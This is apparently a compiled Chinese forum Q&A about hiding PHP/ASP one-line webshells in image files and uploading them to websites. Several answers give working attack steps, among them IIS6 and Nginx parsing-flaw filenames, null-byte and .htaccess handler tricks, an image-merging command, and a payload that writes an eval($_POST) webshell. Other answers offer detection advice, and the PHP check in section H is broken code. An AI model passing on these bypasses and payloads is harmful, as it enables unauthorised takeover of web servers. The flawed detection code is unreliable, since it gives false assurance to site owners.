圖片木馬php

A. 如何利用圖片和一句話木馬合成的jpg（或gif）文件入侵網站

利用資料庫的備份功能把JPG格式的文件備份成ASP或php等格式的文件讓後通過備份路徑直接訪問你的木馬就可以了。這就是後台拿webshell。這是一種常見的方法，還有很都其它的方法要根據網站的實際情況來決定入侵的思路。看看下面的教程吧： http://www.google.com/s.php?q=%BA%F3%CC%A8%C4%C3webshell+%BD%CC%B3%CC&num=10

B. 你好，我拿到一個php網站後台，，他上傳只支持jpg和gif兩種形式，我要怎麼傳馬

利用圖片上傳漏洞上傳木馬是入侵網站中是比較常見的，不過你拿到圖片上傳許可權也不代表就能上傳木馬，這主要還得取決於目標網站的程序是否檢查嚴格。
一般常見的傳馬方式有很多，例如將木馬文件名改為 "文件名.asp;.jpg" 偽裝成JPG文件上傳，這是利用了IIS6的解析漏洞，他會將該文件當成asp文件運行。
還有如果有創建目錄的許可權，你可以先創建一個格式為"xxx.asp"的文件夾，然後將木馬的後綴改為JPG或GIF，上傳之改文件夾，訪問的時候，雖然你訪問的文件後綴的JPG或GIF,IIS6也會將你上傳的圖片文件當成ASP文件執行的.
當然，方法還有很多，但是所有方法都不是通用的，需要根據程序和伺服器的具體情況來使用相應的方法或組合這些方法。
如果你對伺服器和程序的信息不了解，你可也以先用各種方法不斷的嘗試，這樣有幾率成功，而且在不斷的嘗試過程中，可以綜合出一些相關信息，從而更能有效的組織下一次的嘗試方案。

C. 一句話木馬圖片合二為一後，上傳到伺服器了，客戶端連不上！！結尾是

上傳後改下後綴，學習拿站拿伺服器首選，烏龍寺技術站

D. 如何利用圖片一句話木馬

我用 DOS合並： 1.gif /b + 1.txt/a php.gif 製作出來了圖片木馬，上傳到了對方Apache伺服器的根目錄里，可惜用Lanker連接不上啊，好像無法解析圖片裡面的一句話代碼~！ 悲催

E. 如何判斷圖片是否含有asp或php一句話木馬

如果圖片上有這些代碼的話，一般殺毒軟體都能查出來
你一打開網站，都會已經刪除
圖片是可以帶病毒的

F. 求一個可以檢測PHP圖片木馬的方法!!! - 技術問答

你說的應該是網站IIS上傳漏洞吧？在．jpg圖片格式前，加上．asp或是php，由於程序對他對其格式的判斷不嚴格所以它可以上傳！這個上傳的網頁木馬一旦上傳成功！通過這個小馬，可以在上傳一份大馬！然後直接可以獲得網站最高許可權！可以將自己的網頁程序升級到最新，因為這個上傳漏洞比較早了！還可以取消上傳功能！

G. php 上傳文件但可以防圖片木馬

樓上的真厲害...包含PHP的就判斷是病毒...我也是服了....

圖片木馬只是外行人的稱呼，試問就算你上傳了一個病毒，可是它會自運行嗎？它運行的前提是必須經過事件機制觸發它才能運行。你用滑鼠雙機打開就是一個事件機制。

而web上所說的木馬其實是一個PHP或asp。。之類的文件，觸發它的前提是php解釋器執行該文件。
這里以apache為例，判斷用戶請求的頁面mine是php 就調用php去編譯執行該文件，如果是jpg就直接返回給用戶下載。
所以你只要判斷文件的後綴是否圖片格式(jpg,png,gif...)的就可以了，然後上傳成功就把它改名，最後再添加(.jpg,png,gif)的後綴

H. php 防偽裝成jpg格式的php木馬文件

讀取文件
$data=readfile(xxx.jpg);
if((strpos($data,"php"))== -1){
echo "安全";
}else{
echo "文件中包含php字元，這不是一個圖形文件";
}

I. 怎麼樣調用php圖片木馬

利用解析漏洞

一、IIS 5.x/6.0解析漏洞
IIS 6.0解析利用方法有兩種
1.目錄解析
/xx.asp/xx.jpg

2.文件解析
wooyun.asp;.jpg

第一種，在網站下建立文件夾的名字為 .asp、.asa 的文件夾，其目錄內的任何擴展名的文件都被IIS當作asp文件來解析並執行。

例如創建目錄 wooyun.asp，那麼
/wooyun.asp/1.jpg

將被當作asp文件來執行。假設黑闊可以控制上傳文件夾路徑,就可以不管你上傳後你的圖片改不改名都能拿shell了。
第二種，在IIS6.0下，分號後面的不被解析，也就是說
wooyun.asp;.jpg

會被伺服器看成是wooyun.asp還有IIS6.0 默認的可執行文件除了asp還包含這三種
/wooyun.asa
/wooyun.cer
/wooyun.cdx

二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…
在默認Fast-CGI開啟狀況下,黑闊上傳一個名字為wooyun.jpg，內容為
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件，然後訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬 shell.php

三、Nginx <8.03 空位元組代碼執行漏洞
影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在圖片中嵌入PHP代碼然後通過訪問
xxx.jpg%00.php

來執行其中的代碼

四、Apache解析漏洞
Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.
比如 wooyun.php.owf.rar 「.owf」和」.rar」 這兩種後綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.
如何判斷是不是合法的後綴就是這個漏洞的利用關鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…（把你知道的常見後綴都寫上…）去測試是否是合法後綴

五、其他
在windows環境下，xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的，若這樣命名，windows會默認除去空格或點,黑客可以通過抓包，在文件名後加一個空格或者點繞過黑名單.若上傳成功，空格和點都會被windows自動消除,這樣也可以getshell。
如果在Apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入:
<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然後再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php文件

J. 如何檢查圖片是否含有asp、php木馬

其實如果光把PHP語句放到圖片里是無論如何也不能執行的，因為PHP只解析擴展名為php的文件，所以要執行被插入到圖片裡面的代碼只能通過調用，所以必須同時上傳一個能調用代碼的php文件，檢查下有沒有多出什麼文件吧